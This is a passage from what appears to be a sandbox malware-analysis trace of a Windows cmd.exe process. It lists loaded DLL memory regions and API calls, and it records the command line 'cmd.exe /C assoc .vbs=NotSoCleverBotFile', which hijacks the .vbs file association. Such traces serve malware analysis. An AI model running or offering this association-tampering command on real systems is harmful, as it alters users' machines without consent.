= 1829 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1830 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1831 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1832 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1833 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1834 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1835 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1836 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1837 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1838 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1839 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1840 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1841 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1842 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1843 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1844 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1845 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1846 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1847 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1848 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1849 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1850 start_va = 0x4d60000 end_va = 0x615ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 1851 start_va = 0x6160000 end_va = 0x655afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006160000" filename = "" Region: id = 1852 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1853 start_va = 0x71ee0000 end_va = 0x71f54fff monitored = 0 entry_point = 0x71f19a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1854 start_va = 0x750000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 1855 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 1857 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1858 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1859 start_va = 0x74ad0000 end_va = 0x74bbafff monitored = 0 entry_point = 0x74b0d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1860 start_va = 0x750000 end_va = 0x7e0fff monitored = 0 entry_point = 0x788cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1861 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Thread: id = 147 os_tid = 0x107c [0259.452] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0259.453] __set_app_type (_Type=0x1) [0259.453] __p__fmode () returned 0x74ac4d6c [0259.453] __p__commode () returned 0x74ac5b1c [0259.453] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0259.453] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0259.453] GetCurrentThreadId () returned 0x107c [0259.453] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x107c) returned 0x84 [0259.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0259.454] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0259.454] SetThreadUILanguage (LangId=0x0) returned 0x409 [0259.897] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0259.897] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0259.897] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0259.897] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0259.897] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0259.897] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0259.897] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0259.897] GetConsoleOutputCP () returned 0x1b5 [0259.918] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0259.918] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0259.918] _get_osfhandle (_FileHandle=1) returned 0x3c [0259.918] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0260.003] _get_osfhandle (_FileHandle=1) returned 0x3c [0260.003] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0260.008] _get_osfhandle (_FileHandle=1) returned 0x3c [0260.008] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0260.014] _get_osfhandle (_FileHandle=0) returned 0x38 [0260.014] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0260.038] _get_osfhandle (_FileHandle=0) returned 0x38 [0260.038] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0260.041] GetEnvironmentStringsW () returned 0x557cf8* [0260.041] GetProcessHeap () returned 0x550000 [0260.041] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa1a) returned 0x558720 [0260.041] FreeEnvironmentStringsA (penv="A") returned 1 [0260.041] GetProcessHeap () returned 0x550000 [0260.041] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4) returned 0x550550 [0260.041] GetEnvironmentStringsW () returned 0x557cf8* [0260.041] GetProcessHeap () returned 0x550000 [0260.041] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa1a) returned 0x559148 [0260.042] FreeEnvironmentStringsA (penv="A") returned 1 [0260.042] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0260.042] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0260.042] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0260.042] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0260.042] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0260.042] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0260.042] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0260.042] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0260.042] RegCloseKey (hKey=0x94) returned 0x0 [0260.042] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0260.042] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0260.043] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0260.043] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0260.043] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0260.043] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0260.043] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0260.043] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0260.043] RegCloseKey (hKey=0x94) returned 0x0 [0260.043] time (in: timer=0x0 | out: timer=0x0) returned 0x620b751f [0260.043] srand (_Seed=0x620b751f) [0260.043] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .vbs=NotSoCleverBotFile" [0260.043] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C assoc .vbs=NotSoCleverBotFile" [0260.043] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0260.043] GetProcessHeap () returned 0x550000 [0260.043] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x559b70 [0260.043] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x559b78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0260.043] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0260.044] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0260.044] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0260.044] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0260.044] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0260.044] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0260.044] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0260.044] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0260.044] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0260.044] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0260.044] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0260.044] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0260.044] GetProcessHeap () returned 0x550000 [0260.045] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x558720) returned 1 [0260.045] GetEnvironmentStringsW () returned 0x557cf8* [0260.045] GetProcessHeap () returned 0x550000 [0260.045] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa32) returned 0x55a7c8 [0260.045] FreeEnvironmentStringsA (penv="A") returned 1 [0260.045] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0260.045] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0260.045] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0260.045] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0260.045] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0260.045] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0260.045] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0260.045] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0260.045] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0260.045] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0260.046] GetProcessHeap () returned 0x550000 [0260.046] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x44) returned 0x5505c8 [0260.046] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0260.046] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0260.046] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0260.046] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x550618 [0260.046] FindClose (in: hFindFile=0x550618 | out: hFindFile=0x550618) returned 1 [0260.047] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x550618 [0260.047] FindClose (in: hFindFile=0x550618 | out: hFindFile=0x550618) returned 1 [0260.047] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0260.047] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x550618 [0260.047] FindClose (in: hFindFile=0x550618 | out: hFindFile=0x550618) returned 1 [0260.047] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0260.048] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0260.048] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0260.048] GetProcessHeap () returned 0x550000 [0260.048] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x55a7c8) returned 1 [0260.048] GetEnvironmentStringsW () returned 0x557cf8* [0260.048] GetProcessHeap () returned 0x550000 [0260.048] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xa76) returned 0x559d88 [0260.048] FreeEnvironmentStringsA (penv="=") returned 1 [0260.048] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0260.048] GetProcessHeap () returned 0x550000 [0260.048] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x5505c8) returned 1 [0260.049] GetProcessHeap () returned 0x550000 [0260.049] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400e) returned 0x55bc88 [0260.049] GetProcessHeap () returned 0x550000 [0260.049] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x55a808 [0260.049] GetProcessHeap () returned 0x550000 [0260.050] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x55bc88) returned 1 [0260.050] GetConsoleOutputCP () returned 0x1b5 [0260.065] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0260.065] GetUserDefaultLCID () returned 0x409 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0260.066] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0260.066] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0260.068] GetProcessHeap () returned 0x550000 [0260.068] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20c) returned 0x55a8a0 [0260.068] GetConsoleTitleW (in: lpConsoleTitle=0x55a8a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0260.091] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0260.091] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0260.091] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0260.091] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0260.092] GetProcessHeap () returned 0x550000 [0260.092] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x55bc88 [0260.092] GetProcessHeap () returned 0x550000 [0260.092] RtlFreeHeap (HeapHandle=0x550000, Flags=0x0, BaseAddress=0x55bc88) returned 1 [0260.093] _wcsicmp (_String1="assoc", _String2=")") returned 56 [0260.093] _wcsicmp (_String1="FOR", _String2="assoc") returned 5 [0260.093] _wcsicmp (_String1="FOR/?", _String2="assoc") returned 5 [0260.093] _wcsicmp (_String1="IF", _String2="assoc") returned 8 [0260.093] _wcsicmp (_String1="IF/?", _String2="assoc") returned 8 [0260.093] _wcsicmp (_String1="REM", _String2="assoc") returned 17 [0260.093] _wcsicmp (_String1="REM/?", _String2="assoc") returned 17 [0260.093] GetProcessHeap () returned 0x550000 [0260.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x55aab8 [0260.093] GetProcessHeap () returned 0x550000 [0260.093] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x14) returned 0x557600 [0260.094] GetProcessHeap () returned 0x550000 [0260.094] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3a) returned 0x55ab18 [0260.095] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0260.099] _wcsicmp (_String1="assoc", _String2="DIR") returned -3 [0260.099] _wcsicmp (_String1="assoc", _String2="ERASE") returned -4 [0260.099] _wcsicmp (_String1="assoc", _String2="DEL") returned -3 [0260.099] _wcsicmp (_String1="assoc", _String2="TYPE") returned -19 [0260.099] _wcsicmp (_String1="assoc", _String2="COPY") returned -2 [0260.099] _wcsicmp (_String1="assoc", _String2="CD") returned -2 [0260.099] _wcsicmp (_String1="assoc", _String2="CHDIR") returned -2 [0260.099] _wcsicmp (_String1="assoc", _String2="RENAME") returned -17 [0260.099] _wcsicmp (_String1="assoc", _String2="REN") returned -17 [0260.099] _wcsicmp (_String1="assoc", _String2="ECHO") returned -4 [0260.099] _wcsicmp (_String1="assoc", _String2="SET") returned -18 [0260.099] _wcsicmp (_String1="assoc", _String2="PAUSE") returned -15 [0260.099] _wcsicmp 